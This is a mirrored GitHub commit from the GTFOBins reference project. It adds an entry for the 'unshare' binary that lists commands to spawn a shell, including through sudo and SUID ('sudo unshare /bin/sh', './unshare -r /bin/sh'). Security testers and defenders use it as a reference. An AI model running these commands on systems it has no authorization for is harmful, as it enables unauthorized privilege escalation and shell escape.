mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-24 22:09:35 +01:00
Add unshare
This commit is contained in:
parent
80f6167334
commit
d1906b7fdd
12
_gtfobins/unshare.md
Normal file
12
_gtfobins/unshare.md
Normal file
@ -0,0 +1,12 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: unshare /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo unshare /bin/sh
|
||||
suid-enabled:
|
||||
- description: This keeps the SUID privileges only if the `-r` option is present.
|
||||
code: ./unshare -r /bin/sh
|
||||
suid-limited:
|
||||
- code: ./unshare /bin/sh
|
||||
---
|
Loading…
Reference in New Issue
Block a user